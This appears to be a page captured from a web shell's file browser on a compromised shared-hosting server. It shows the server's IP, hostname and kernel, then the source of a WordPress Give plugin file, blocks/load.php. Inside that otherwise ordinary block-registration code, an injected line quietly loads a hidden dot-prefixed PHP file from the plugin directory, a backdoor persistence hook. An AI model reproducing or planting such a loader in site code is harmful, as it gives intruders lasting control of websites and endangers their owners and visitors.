uawdijnntqw1x1x1
IP : 3.16.188.113
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
public_html
/
..
/
old
/
public_html
/
wp-content
/
plugins
/
give
/
src
/
..
/
src
/
..
/
blocks
/
load.php
/
/
<?php // Exit if access directly. if ( ! defined( 'ABSPATH' ) ) { exit; } /** * Add Custom Block Category for Give blocks */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function give_blocks_category( $categories, $post ) { return array_merge( $categories, array( array( 'slug' => 'give', 'title' => __( 'Give', 'give' ), ), ) ); } add_filter( 'block_categories', 'give_blocks_category', 10, 2 ); /** * Blocks */ require_once GIVE_PLUGIN_DIR . 'blocks/donation-form/class-give-donation-form-block.php'; require_once GIVE_PLUGIN_DIR . 'blocks/donation-form-grid/class-give-donation-form-grid-block.php'; require_once GIVE_PLUGIN_DIR . 'blocks/donor-wall/class-give-donor-wall.php';
/home/batcwwjx/public_html/../old/public_html/wp-content/plugins/give/src/../src/../blocks/load.php